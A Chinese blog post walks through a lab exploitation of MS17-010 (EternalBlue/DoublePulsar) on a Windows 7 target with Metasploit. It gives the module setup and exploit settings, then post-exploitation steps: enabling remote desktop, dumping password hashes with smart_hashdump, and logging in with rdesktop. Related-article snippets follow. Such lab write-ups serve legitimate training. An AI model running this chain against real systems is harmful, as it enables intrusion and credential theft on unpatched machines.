Metasploit渗透测试(双脉冲星)

已于 2024-01-17 16:17:40 修改
阅读量1.7k 收藏 6
点赞数 10
分类专栏: 网络空间安全(职业技能大赛) 文章标签: 渗透测试 网络安全
于 2021-04-21 18:30:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aluxian_/article/details/115969032
版权

MS17-010(EternalBlue)

靶机:win7:service Pack1 172.16.5.201

靶机下载

攻击机:kali 172.16.5.158

而且要保证两台机器之间可以ping通

因为kali里面没有这个rb源代码 所以我们要把这个模块导入进去

image.png
我们先要smb模块下载到这里面

#cd /usr/share/metasploit-framework/modules/exploits/windows/smb
#https://github.com/1stPeak/Eternalblue-Doublepulsar-Metasploit-master

将Eternalblue-Doublepulsar-Metasploit文件夹depseternalblue_doublepulsar.rb复制到/smb目录下然后删除EternalblueDoublepulsar-Metasploit文件夹

#apt-get update 更新kali

#apt-get install wine32 安装wine32

win32(兼容层) 可以在Linux操作系统上运行 Windows 应用的兼容层

#msfconsole 开启Msf控制台

#use exploit/windows/smb/eternalblue_doublepulsar

#show options 看设置选项

#set RHOST 172.16.5.201

#set PROCESSINJECT explorer.exe

#exploit 执行利用
image.png

这个时候我们就进入了后渗透模块 如果不知道用什么命令可以 -h

查看目标机的系统信息

meterpreter> sysinfo

image.png

meterpreter> run getgui -e

开启靶机远程桌面

meterpreter >run———— windows/gather/smart_hashdump

获取了账号和密码使用 rdesktop 进行远程连接

rdesktop 172.16.5.201

image.png
最后可以看到已经连接到靶机了,说明渗透成功,如果对大家有帮助话麻烦大家一键三连谢谢大家!

落寞的魚丶
关注
专栏目录
【漏洞利用】使用永恒之蓝的倍脉冲模块(Eternalblue_doublepulsar)渗透攻击Win_7 32位主机
ATree的博客
12-20 1万+
使用这个模块本来是用来做攻击测试的,但是我始终没有测试成功,我大概花了1天半的时间,一直在研究为什么网上的文章里都显示测试成功了,我的就没有成功,一直在找原因,因为除了时间上的差异,kali模块增多,高版本的wine32软件,我真的不知道到底问题出在哪里了,就真的只好从这些方面入手去排查,从问题出发找原因,这个真的需要耐心,毅力。 我写的详细些,大家也就看的明白,这样就能保证你一次成功的概率比较...
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试...
脉冲星DoublePulsar)检测脚本使用指南
最新发布
gitblog_00236的博客
08-10 457
脉冲星DoublePulsar)检测脚本使用指南 doublepulsar-detection-scriptA python2 script for sweeping a network to find windows systems compromised with the DOUBLEPULSAR implant.项目地址:https://gitcode.com/gh_mirrors/d...
Eternalblue-Doublepulsar-Metasploit:利用漏洞Eternalblue-DoublepulsarMetasploit模块
05-02
永恒的蓝色-脉冲星-元宝 本软件按“原样”提供,不提供任何形式的明示或暗示担保,包括但不限于对适销性,特定目的的适用性和非侵权性的担保。 无论是由于软件,使用或其他方式产生的,与之有关或与之有关的合同,侵权或其他形式的任何索赔,损害或其他责任,作者或版权所有者概不负责。软件。
最新CobaltStrike4.9Windows/Linux/Mac版下载
weixin_43167326的博客
08-09 621
2023 年 9 月 19 日 – Cobalt Strike 4.9授权文件不再向后兼容。更改了后缀 DLL,以使用预加载器(sRDI/Double Pulsar)。已在 browserpivot、hashdump、invokeassembly、keylogger、mimikatz、netview、portscan、powershell、screenshot 和 sshagent 中实施。
NSA泄露的恶意软件DoublePulsar感染了数万台Windows电脑
weixin_33730836的博客
09-19 989
本文讲的是NSA泄露的恶意软件DoublePulsar感染了数万台Windows电脑, 安全研究人员认为,世界各地的脚本小子和在线犯罪分子正在利用Shadow Brokers 黑客组织上周泄露的NSA黑客工具,致使全球数十万台Windows计算机正面临网络攻击威胁。 上周,被称为“Shadow Brokers”的神秘黑客组织泄露了一套据称是属于NSA“...
探索网络攻防:Eternalblue-Doublepulsar-Metasploit 开源项目详解
gitblog_00049的博客
05-15 310
探索网络攻防:Eternalblue-Doublepulsar-Metasploit 开源项目详解 Eternalblue-Doublepulsar-MetasploitModule of Metasploit to exploit the vulnerability Eternalblue-Doublepulsar.项目地址:https://gitcode.com/gh_mirrors/et/...
永恒之蓝
weixin_30239339的博客
04-03 388
起因 最近在学习内网渗透,考虑到永恒家族的重要性,记录一下永恒之蓝的利用过程,一般用在win server 2008和win7上。 我们以win7 64位为例子 exploit github地址 目标机器:windows 7 sp1 64位 攻击机器:kali 64位 首先我们安装wine32组件。 dpkg --add-architecture i386 apt-get install wine...
Metasploit渗透测试指南(全) .pdf
12-23
Metasploit渗透测试指南》是一本全面介绍Metasploit框架的权威书籍,它涵盖了从基础知识到高级技术的广泛内容,旨在帮助读者理解和掌握渗透测试的精髓。Metasploit是一款强大的安全工具,广泛用于安全研究、漏洞...
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
**Metasploit渗透测试指南** 渗透测试是一种授权的安全测试,旨在发现并评估计算机网络和系统的弱点,以增强安全防御。Metasploit是一款广泛使用的开源工具,专为安全专业人士设计,用于执行这种测试。本指南将深入...
Metasploit渗透测试指南 修订版
09-21
Metasploit渗透测试指南 修订版》是一本深度探讨Metasploit框架的权威书籍,旨在帮助初学者和专业人士理解并掌握网络安全领域的渗透测试技术。Metasploit是一款强大的开源安全工具,广泛应用于安全评估、漏洞验证...
MS17-010永恒之蓝漏洞利用(windows7 32位)
逍遥小哥的博客
01-11 791
第二步:把Eternalblue-Doublepulsar-Metasploit文件中的eternalblue_doublepulsar.rb 拷贝到/usr/share/metasploit-framework/modules/exploits/windows/smb。sudo dpkg --add-architecture i386 (开启 32 位架构支持)sudo apt install --install-recommends wine 安装。然后安装win 32架构。接下来开始用msf来打。
利用MS17-010渗透win7(32位)
热门推荐
1stPeak's Blog
06-07 2万+
MS17-010就是我们常说的永恒之蓝漏洞 1.首先我们测试目标系统是否存在该漏洞 2.永恒之蓝漏洞利用前的准备与之后的实施 3.问题总结 4.如果使用该模块攻击win7x64注意事项 这篇文章主要写的是对win7(x86)系统的渗透,x64的请点击这里利用MS17-010渗透win7(64位),我们这里的环境是攻击者(IP:192.168.1.222),靶机(IP:192.168.1.221)...
smb(ms17-010)远程命令执行之msf
weixin_30270561的博客
05-03 325
本次用到的环境: kali(2016.2)32位系统.ip地址:192.168.1.104 目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.105 具体的步骤如下: kali系统下安装wine32: apt-get install wine32 用wine32执行cmd.exe wine cmd.exe ex...
MS17-010漏洞复现(x32)以及分析
r250414958的博客
12-17 6159
复现可以使用两种方式 1.ShadowBroker释放的NSA工具 2.kali的Metasploit 第一种网上有很多教程 https://www.freebuf.com/sectool/132076.html https://www.cnblogs.com/peterpan0707007/p/7450668.html 都说得很详细,我自己也实现了一遍,不过不便于我们后面分析 所以接下来介绍第二...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落寞的魚丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值